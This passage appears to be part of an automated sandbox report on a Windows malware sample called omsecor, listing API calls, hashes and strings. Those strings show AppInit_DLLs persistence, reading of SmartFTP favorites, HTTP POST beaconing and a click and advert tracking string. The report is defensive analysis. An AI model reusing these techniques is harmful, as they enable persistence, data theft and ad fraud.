                                                                                                                                                                                                  • Opcode ID: c6b2da4a895c5a3c06ad821b8c76fb1796c02a28dfb90d6d9730734cddc33c41
                                                                                                                                                                                                  • Instruction ID: 23ab6f573089ca27c74aa918c09813edc931bf25471b74fd790eff350109b64e
                                                                                                                                                                                                  • Opcode Fuzzy Hash: c6b2da4a895c5a3c06ad821b8c76fb1796c02a28dfb90d6d9730734cddc33c41
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8D319231A00219ABCB21EF61DE49AEF7769FF04748F00043BF905B21C1D6789A51CBAE
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • SysFreeString.OLEAUT32(?), ref: 004094E6
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000002.00000002.2260030732.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000002.00000002.2259985197.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.2260054654.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.2260070852.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_omsecor.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: FreeString
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3341692771-0
                                                                                                                                                                                                  • Opcode ID: 99a964074df9a43e7876bfa78059f63c2205d652b6a4e0ea0b2e4f8e9ecac31d
                                                                                                                                                                                                  • Instruction ID: b8745a711dcf8da59f3798694fa3079dcf63c40c9cdbadd59c4d39193402e254
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 99a964074df9a43e7876bfa78059f63c2205d652b6a4e0ea0b2e4f8e9ecac31d
                                                                                                                                                                                                  • Instruction Fuzzy Hash: C9214832A00108BBDB01DFAADC44B9E7BB8EF48345F1484B6E805F71A1D774AE41DB84
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • _memset.LIBCMT ref: 0040A26B
                                                                                                                                                                                                  • SysAllocString.OLEAUT32(?), ref: 0040A28E
                                                                                                                                                                                                  • SysAllocString.OLEAUT32(?), ref: 0040A296
                                                                                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 0040A2CA
                                                                                                                                                                                                  • SysFreeString.OLEAUT32(?), ref: 0040A2CF
                                                                                                                                                                                                    • Part of subcall function 00409FB1: GetTickCount.KERNEL32 ref: 00409FCE
                                                                                                                                                                                                    • Part of subcall function 00409FB1: GetTickCount.KERNEL32 ref: 00409FDE
                                                                                                                                                                                                    • Part of subcall function 00409FB1: Sleep.KERNEL32(00000064,?,?,0040A442,?,?), ref: 00409FEC
                                                                                                                                                                                                    • Part of subcall function 00409FB1: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409FFB
                                                                                                                                                                                                    • Part of subcall function 00409FB1: DispatchMessageW.USER32(?), ref: 0040A009
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000002.00000002.2260030732.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000002.00000002.2259985197.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.2260054654.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.2260070852.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_omsecor.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: String$AllocCountFreeMessageTick$DispatchPeekSleep_memset
                                                                                                                                                                                                  • String ID: J(@
                                                                                                                                                                                                  • API String ID: 3143865713-2848800318
                                                                                                                                                                                                  • Opcode ID: 68495801366515c75ff4f7091ec1779cfaae467043e456767ef3efc9e03748a3
                                                                                                                                                                                                  • Instruction ID: bfa1c3e5fdaec5be4dfb18607c12502589e7fd5433bac8caf4aacda455aa0499
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 68495801366515c75ff4f7091ec1779cfaae467043e456767ef3efc9e03748a3
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3A118F72D10219ABCB00DFA9DD448DEBBB9FF08354B11456AF415B7290E770AE14CFA4
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows NT\CurrentVersion\Windows,00000000,00000001,?,?,00000000), ref: 00408628
                                                                                                                                                                                                  • GetLastError.KERNEL32(?,00000000), ref: 0040864A
                                                                                                                                                                                                    • Part of subcall function 004069C0: RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,75A8E9B0,?,?,?,0040AC8C,IueiOod,?,?,0040AB30,?), ref: 004069E3
                                                                                                                                                                                                    • Part of subcall function 004069C0: RegCloseKey.KERNEL32(00000000,?,?,?,0040AC8C,IueiOod,?,?,0040AB30,?,?,0040B3E5), ref: 004069ED
                                                                                                                                                                                                  • DeleteFileW.KERNEL32(C:\WINDOWS\system32\gbdwpbm.dll,?,00000000), ref: 00408687
                                                                                                                                                                                                    • Part of subcall function 004069FD: RegCreateKeyExW.ADVAPI32(0040EA48,00000000,00000000,00000000,00000000,00020006,00000000,00000002,0040EA48,?,?,?,?,00406AD3,80000001,AppEvents\Schemes\Apps\Explorer\Navigating\.current), ref: 00406A22
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000002.00000002.2260030732.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000002.00000002.2259985197.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.2260054654.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.2260070852.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_omsecor.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CloseCreateDeleteErrorFileLastOpenQueryValue
                                                                                                                                                                                                  • String ID: AppInit_DLLs$C:\WINDOWS\system32\gbdwpbm.dll$Software\Microsoft\Windows NT\CurrentVersion\Windows
                                                                                                                                                                                                  • API String ID: 4026185228-3265104503
                                                                                                                                                                                                  • Opcode ID: b4fb547f36a341d56e63cd8c3141924342823e6c0e28cdd89059e7ce4998d0d2
                                                                                                                                                                                                  • Instruction ID: 1689b80d2e7b4165945397198c320d7ed833f5e108bfbebac4dfc06446509e60
                                                                                                                                                                                                  • Opcode Fuzzy Hash: b4fb547f36a341d56e63cd8c3141924342823e6c0e28cdd89059e7ce4998d0d2
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 99014CB2A44124B6E62067665E06F9B72AC9B00750F220D7BF905F31C0DABA9D1446AD
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • SysAllocString.OLEAUT32(?), ref: 00409B00
                                                                                                                                                                                                  • SysAllocString.OLEAUT32(?), ref: 00409B0E
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000002.00000002.2260030732.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000002.00000002.2259985197.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.2260054654.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.2260070852.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_omsecor.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: AllocString
                                                                                                                                                                                                  • String ID: </title>$</url>$<title>$<url>
                                                                                                                                                                                                  • API String ID: 2525500382-2286408829
                                                                                                                                                                                                  • Opcode ID: accc4c2b32817054c02e480ca82d26facf4490b578c9b74d600f9b3addd9539d
                                                                                                                                                                                                  • Instruction ID: e94fff7a9c4556839c155ffec7726d55edf757161a42396596b5093e86978141
                                                                                                                                                                                                  • Opcode Fuzzy Hash: accc4c2b32817054c02e480ca82d26facf4490b578c9b74d600f9b3addd9539d
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4F01DB7564021CA7DB116A55CC41FD637A8BB44799F044077FA04F32C3E978AA0C4BA4
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                    • Part of subcall function 00406D14: InternetAttemptConnect.WININET(00000000), ref: 00406D18
                                                                                                                                                                                                  • Sleep.KERNEL32(00002710,?,?,?,?,00402C8F,00000032,00000000,00000000,00000000,00000000,?), ref: 0040A91C
                                                                                                                                                                                                  • Sleep.KERNEL32(00002710), ref: 0040AAC1
                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040AAE9
                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000), ref: 0040AAF0
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  • 0, xrefs: 0040AA5B
                                                                                                                                                                                                  • jstat^rev=%s^code=%s^site=%s^searches=%s^clicks=%s^adver=%s^os=%s, xrefs: 0040A957
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000002.00000002.2260030732.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000002.00000002.2259985197.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.2260054654.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.2260070852.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_omsecor.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: HeapSleep$AttemptConnectFreeInternetProcess
                                                                                                                                                                                                  • String ID: 0$jstat^rev=%s^code=%s^site=%s^searches=%s^clicks=%s^adver=%s^os=%s
                                                                                                                                                                                                  • API String ID: 3713053250-1268808612
                                                                                                                                                                                                  • Opcode ID: b149150f67450d10939e037a4072d5df3dc9b6793fc6db3c061519f1f12da8b2
                                                                                                                                                                                                  • Instruction ID: cb73c9a78e41fc00613c6eff30345c36a412e41c8c720ed22b53be089701fd16
                                                                                                                                                                                                  • Opcode Fuzzy Hash: b149150f67450d10939e037a4072d5df3dc9b6793fc6db3c061519f1f12da8b2
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 88515072A00218A6CF10EB95DC959DF737DEF44308F40447BF406B7281EB789A958FAA
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetLocalTime.KERNEL32(?,?), ref: 004074AD
                                                                                                                                                                                                  • GetLocalTime.KERNEL32(00000000), ref: 004074B3
                                                                                                                                                                                                  • GetTimeZoneInformation.KERNEL32(?), ref: 004074EA
                                                                                                                                                                                                  • SystemTimeToFileTime.KERNEL32(000007D8,?), ref: 00407525
                                                                                                                                                                                                  • SystemTimeToFileTime.KERNEL32(000007D8,?), ref: 0040752F
                                                                                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0040754A
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000002.00000002.2260030732.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000002.00000002.2259985197.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.2260054654.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.2260070852.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_omsecor.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Time$FileLocalSystem$InformationUnothrow_t@std@@@Zone__ehfuncinfo$??2@
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3777474486-0
                                                                                                                                                                                                  • Opcode ID: dc75d57b0fd5e0fdd9494c9f665b53f3e55cd7f2b0e9017e93342081d6970c63
                                                                                                                                                                                                  • Instruction ID: c9ff0a62426275c5a0d4f0aa0fa2549fa158b312224671bef63f429b7f92df75
                                                                                                                                                                                                  • Opcode Fuzzy Hash: dc75d57b0fd5e0fdd9494c9f665b53f3e55cd7f2b0e9017e93342081d6970c63
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 03112C72D1022DAADF00EBD4DC44AEEB7FCBF48314F04445AE901B7240E7B9A608CBA5
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000000,00000000), ref: 004083DC
                                                                                                                                                                                                  • GetFileSizeEx.KERNEL32(00000000,?), ref: 004083EF
                                                                                                                                                                                                  • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 00408417
                                                                                                                                                                                                  • ReadFile.KERNEL32(?,00000000,?,?,00000000), ref: 0040842F
                                                                                                                                                                                                  • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00408449
                                                                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 00408452
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000002.00000002.2260030732.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000002.00000002.2259985197.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.2260054654.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.2260070852.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_omsecor.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: File$Virtual$AllocCloseCreateFreeHandleReadSize
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1974014688-0
                                                                                                                                                                                                  • Opcode ID: c2b876117cf5bdd4c26ea99d0d1f22b8a7b68d93f1e59a17f5f06edaaf93f8ba
                                                                                                                                                                                                  • Instruction ID: 01d1f8b5f38b633e5055412454defe488cd8fa266e80ff04f0611ceb3180ae32
                                                                                                                                                                                                  • Opcode Fuzzy Hash: c2b876117cf5bdd4c26ea99d0d1f22b8a7b68d93f1e59a17f5f06edaaf93f8ba
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 47115170500201FBEB305F56CE49E5BBBB9EB90700F10892DF596F21E0EB74A951DB28
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • InternetConnectW.WININET(?,00000050,00000000,00000000,00000003,00000000,00000000,?), ref: 00409EA3
                                                                                                                                                                                                  • HttpOpenRequestW.WININET(00000000,POST,04400100,00000000,00000000,00000000,04400100,00000000), ref: 00409EC3
                                                                                                                                                                                                  • HttpSendRequestW.WININET(00000000,00000000,00000000,?,?), ref: 00409EDA
                                                                                                                                                                                                  • InternetReadFile.WININET(00000000,?,00001000,?), ref: 00409F00
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000002.00000002.2260030732.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000002.00000002.2259985197.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.2260054654.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.2260070852.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_omsecor.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: HttpInternetRequest$ConnectFileOpenReadSend
                                                                                                                                                                                                  • String ID: POST
                                                                                                                                                                                                  • API String ID: 961146071-1814004025
                                                                                                                                                                                                  • Opcode ID: 20f9c5eacef7b48b8181bad7e01822bf71c4addd269446e4957b1a187c5c6ded
                                                                                                                                                                                                  • Instruction ID: 440a75f1c6cd1a7483e62584c22426b42aa3ce760e55699d8a89a0e8c7b72afb
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 20f9c5eacef7b48b8181bad7e01822bf71c4addd269446e4957b1a187c5c6ded
                                                                                                                                                                                                  • Instruction Fuzzy Hash: B8318E71900119BFDB10DBA4DC84EFE7679EB54349F14087AFA41B62C2D6385E448BA8
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                    • Part of subcall function 0040848F: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,?,00000104,00000000,?,?,?,00403796,?,?,00000104,?,00000000), ref: 004084A5
                                                                                                                                                                                                  • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,?,?,?,00000008), ref: 004051EB
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  • personal favorites, xrefs: 00405176
                                                                                                                                                                                                  • folder, xrefs: 00405184
                                                                                                                                                                                                  • SOFTWARE\smartftp\client 2.0\settings\general\favorites, xrefs: 00405157
                                                                                                                                                                                                  • SOFTWARE\smartftp\client 2.0\settings\backup, xrefs: 00405168
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000002.00000002.2260030732.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000002.00000002.2259985197.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.2260054654.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.2260070852.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_omsecor.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: EnvironmentExpandOpenStrings
                                                                                                                                                                                                  • String ID: SOFTWARE\smartftp\client 2.0\settings\backup$SOFTWARE\smartftp\client 2.0\settings\general\favorites$folder$personal favorites
                                                                                                                                                                                                  • API String ID: 3923277744-821743658
                                                                                                                                                                                                  • Opcode ID: e843f97767911fec9b6fd3034691d6ab50a9750596cd8693bb12be5acb83529b
                                                                                                                                                                                                  • Instruction ID: 0454e2dbaba930a1c05830d090df37f1eb9a44f33d61805f8e12f109ce5a2445
                                                                                                                                                                                                  • Opcode Fuzzy Hash: e843f97767911fec9b6fd3034691d6ab50a9750596cd8693bb12be5acb83529b
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 21213E71D00518ABDB10EB95DC41ADFB7BCEB44318F1084B7E514B2181EB389B49CFA9
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • CoInitialize.OLE32(00000000), ref: 0040A0C0
                                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000,00000000,?,?,0040A16F,00427ED0,00000000,00000001,?,00402806,?), ref: 0040A0CE
                                                                                                                                                                                                  • CreateWindowExW.USER32(00000000,AtlAxWin,Shell.Explorer,80000000,00000000,00000000,000004B0,00000320,00000000,00000000,00000000), ref: 0040A0F3
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000002.00000002.2260030732.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000002.00000002.2259985197.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.2260054654.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.2260070852.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_omsecor.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CreateHandleInitializeModuleWindow
                                                                                                                                                                                                  • String ID: AtlAxWin$Shell.Explorer
                                                                                                                                                                                                  • API String ID: 950422046-1300462704
                                                                                                                                                                                                  • Opcode ID: e9b6661190c81bdf072f7cb3f1dc159ab5559684b807faa4a04e62d0e94038f2
                                                                                                                                                                                                  • Instruction ID: 8885d0d040d3ab3e1edd42f45155a7fe84e7bff231f75e8e802cb7627400a982
                                                                                                                                                                                                  • Opcode Fuzzy Hash: e9b6661190c81bdf072f7cb3f1dc159ab5559684b807faa4a04e62d0e94038f2
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 78118F30200200FFD320ABA6CC4CE6B7BBCEFCA711B240579F515EB291D7789801CA65
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetSystemTime.KERNEL32(?,?,000003E8,?,?,?,?,?,?,?,?,?,?,?,00407B63,?), ref: 0040727C
                                                                                                                                                                                                  • SystemTimeToFileTime.KERNEL32(?,?,?,000003E8,?), ref: 004072C1
                                                                                                                                                                                                  • SystemTimeToFileTime.KERNEL32(000007B2,?), ref: 004072CB
                                                                                                                                                                                                  • __aulldiv.LIBCMT ref: 004072E3
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000002.00000002.2260030732.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000002.00000002.2259985197.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.2260054654.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.2260070852.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_omsecor.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Time$System$File$__aulldiv
                                                                                                                                                                                                  • String ID: c{@
                                                                                                                                                                                                  • API String ID: 3735792614-264719814
                                                                                                                                                                                                  • Opcode ID: a145c05d1847671377470c3096bfc685d9fda3d476ef25e64420ea8c3ac11d0d
                                                                                                                                                                                                  • Instruction ID: ef19eb4ac8525f4bf2260e0142840e6d018c3cac6eb9bd4f47b1f5cd165e8a78
                                                                                                                                                                                                  • Opcode Fuzzy Hash: a145c05d1847671377470c3096bfc685d9fda3d476ef25e64420ea8c3ac11d0d
                                                                                                                                                                                                  • Instruction Fuzzy Hash: D401DE62D1022DAACB01DFE4D984CEFB77DFF44348B00156AE901F7250E7B5AA4887A5
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040286E), ref: 004072F9
                                                                                                                                                                                                  • SystemTimeToFileTime.KERNEL32(?,?), ref: 00407337
                                                                                                                                                                                                  • SystemTimeToFileTime.KERNEL32(000007B2,?), ref: 00407341
                                                                                                                                                                                                  • __aulldiv.LIBCMT ref: 00407359
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000002.00000002.2260030732.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000002.00000002.2259985197.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.2260054654.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.2260070852.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_omsecor.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Time$System$File$__aulldiv
                                                                                                                                                                                                  • String ID: n(@
                                                                                                                                                                                                  • API String ID: 3735792614-2525614082
                                                                                                                                                                                                  • Opcode ID: fb9972a15ff1dd7e61217f7ff9a5823acba4978d5a12943579487cf22718de7c
                                                                                                                                                                                                  • Instruction ID: 0875687ad9f8fbdff1f190dbab39d4211c2ed1a8acd2afdabfbd9ccbaffc37b8
                                                                                                                                                                                                  • Opcode Fuzzy Hash: fb9972a15ff1dd7e61217f7ff9a5823acba4978d5a12943579487cf22718de7c
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 83011A66D2022DAACF00DBE5DD44CEFB7BCFF44344B04051AE901B3210E7B5A648CBA9
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000400), ref: 0040AB93
                                                                                                                                                                                                  • CharLowerW.USER32(?), ref: 0040ABA0
                                                                                                                                                                                                  • GetCommandLineW.KERNEL32 ref: 0040ABC0
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000002.00000002.2260030732.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000002.00000002.2259985197.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.2260054654.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.2260070852.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_omsecor.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CharCommandFileLineLowerModuleName
                                                                                                                                                                                                  • String ID: /updatefile3$netprotdrvss.exe
                                                                                                                                                                                                  • API String ID: 3118597399-3449771660
                                                                                                                                                                                                  • Opcode ID: a9092c2346d55b23f20d8634028d89874de2ded0d1b8197c9b1551ea588aa001
                                                                                                                                                                                                  • Instruction ID: 1eba2a713c21f7c79877a49aa3ec6850c44e44909145826ab611dd80b60fa5a6
                                                                                                                                                                                                  • Opcode Fuzzy Hash: a9092c2346d55b23f20d8634028d89874de2ded0d1b8197c9b1551ea588aa001
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 41E09B3655021A5AD750FBB1DD07BA633ACFB01705F1049B6A246F10C0EE74D55D4F9D
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetTickCount.KERNEL32 ref: 00409FCE
                                                                                                                                                                                                  • GetTickCount.KERNEL32 ref: 00409FDE
                                                                                                                                                                                                  • Sleep.KERNEL32(00000064,?,?,0040A442,?,?), ref: 00409FEC
                                                                                                                                                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409FFB
                                                                                                                                                                                                  • DispatchMessageW.USER32(?), ref: 0040A009
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000002.00000002.2260030732.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000002.00000002.2259985197.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.2260054654.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.2260070852.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_omsecor.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CountMessageTick$DispatchPeekSleep
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 4159783438-0
                                                                                                                                                                                                  • Opcode ID: 45312298ad5970842c5ee584b14830e042aefe59ca6bdbaf3830585a06b866aa
                                                                                                                                                                                                  • Instruction ID: c0dc46c0c87f7bc49602bd7d2efae9f565a6f52602c3eafe7569a8fa2f6b8eea
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 45312298ad5970842c5ee584b14830e042aefe59ca6bdbaf3830585a06b866aa
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3F118671D103199ECB10AFF5CC8899F7BB9BB45314B144A7AE161F71E0C778CA118B1A
                                                                                                                                                                                                  APIs
